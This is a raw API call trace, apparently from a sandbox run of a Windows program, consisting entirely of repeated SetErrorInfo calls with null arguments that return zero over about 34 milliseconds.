[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.125] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.126] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.128] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.128] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.128] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.128] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.128] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.128] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.128] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.129] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.129] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.129] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.129] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.129] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.129] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.129] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.131] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.132] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.132] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.132] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.132] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.132] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.132] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.132] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.132] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.133] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.134] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.135] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.136] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.137] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.138] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.138] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.138] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.138] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.138] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.138] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.138] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.138] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.139] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.141] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.144] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.144] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.144] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.144] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.144] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.144] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.144] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.145] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.146] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.146] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.146] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.146] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.146] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.146] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.146] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.146] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.148] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.148] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.148] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.148] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.148] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.148] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.148] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.149] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.149] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.149] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.149] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.149] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.149] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.149] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.150] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.150] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.150] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.150] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.150] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.150] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.150] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.151] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.152] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.153] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.154] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.155] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.157] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
